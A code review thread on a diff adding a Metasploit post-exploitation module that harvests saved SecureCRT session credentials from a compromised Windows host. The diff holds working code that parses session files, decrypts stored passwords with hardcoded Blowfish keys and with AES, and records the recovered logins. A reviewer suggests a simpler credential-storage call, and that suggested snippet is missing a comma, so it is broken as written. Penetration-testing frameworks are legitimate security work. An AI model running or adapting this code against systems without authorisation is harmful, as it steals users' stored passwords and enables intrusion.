modules/post/windows/gather/credentials/securecrt.rb

```diff
@@ -0,0 +1,203 @@
+      username = Regexp.compile('S:"Username"=([^\r\n]*)').match(file) ? Regexp.last_match(1) : nil
+
+      next unless (hostname && port && protocol)
+
+      tbl << {
+        file_name: item['name'],
+        protocol: protocol.downcase,
+        hostname: hostname,
+        port: port,
+        username: username,
+        password: password || passwordv2
+      }
+    end
+    return tbl
+  end
+
+  def securecrt_crypto(ciphertext)
+    key1 = "\x24\xA6\x3D\xDE\x5B\xD3\xB3\x82\x9C\x7E\x06\xF4\x08\x16\xAA\x07"
+    key2 = "\x5F\xB0\x45\xA2\x94\x17\xD9\x16\xC6\xC6\xA2\xFF\x06\x41\x82\xB7"
+    ciphered_bytes = [ciphertext].pack('H*')
+    cipher_tmp = blowfish_decrypt(key1, ciphered_bytes)[4..-5]
+    padded_plain_bytes = blowfish_decrypt(key2, cipher_tmp)
+    (0..padded_plain_bytes.length).step(2) do |i|
+      if (padded_plain_bytes[i] == "\x00" && padded_plain_bytes[i + 1] == "\x00")
+        return padded_plain_bytes[0..i - 1].force_encoding('UTF-16LE').encode('UTF-8')
+      end
+    end
+    print_warning('It was not possible to decode one of the v1 passwords successfully, please double check the results!')
+    return nil # We didn't decode the password successfully, so just return nil.
+  end
+
+  def securecrt_crypto_v2(ciphertext)
+    iv = ("\x00" * 16)
+    config_passphrase = datastore['PASSPHRASE'] || nil
+    key = OpenSSL::Digest::SHA256.new(config_passphrase).digest
+    aes = OpenSSL::Cipher.new('AES-256-CBC')
+    aes.key = key
+    aes.padding = 0
+    aes.decrypt
+    aes.iv = iv
+    padded_plain_bytes = aes.update([ciphertext].pack('H*'))
+    plain_bytes_length = padded_plain_bytes[0, 4].unpack1('l') # bytes to int little-endian format.
+    plain_bytes = padded_plain_bytes[4, plain_bytes_length]
+    plain_bytes_digest = padded_plain_bytes[4 + plain_bytes_length, 32]
+    if (OpenSSL::Digest::SHA256.new(plain_bytes).digest == plain_bytes_digest) # verify
+      return plain_bytes.force_encoding('UTF-8')
+    end
+
+    print_warning('It seems the user set a configuration password when installing SecureCRT!')
+    print_warning('If you know the configuration password, please provide it via the PASSPHRASE option and then run the module again.')
+    return nil
+  end
+
+  def securecrt_store_config(config)
+    service_data = {
+      address: config[:hostname],
+      port: config[:port],
+      service_name: config[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :session,
+      session_id: session_db_id,
+      post_reference_name: refname,
+      private_type: :password,
+      private_data: config[:password],
+      username: config[:username]
+    }.merge(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      core: credential_core,
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }.merge(service_data)
+
+    create_credential_login(login_data)
```

Comment:
```suggestion
    credential_data = {
      origin_type: :session,
      session_id: session_db_id,
      post_reference_name: refname,
      private_type: :password,
      private_data: config[:password],
      username: config[:username]
      status: Metasploit::Model::Login::Status::UNTRIED
    }.merge(service_data)

    create_credential_and_login(credential_data)
```

Slightly simpler create that will generate the `core` and `login`.

Reply:
Fix has been applied with latest commit, marking this as resolved.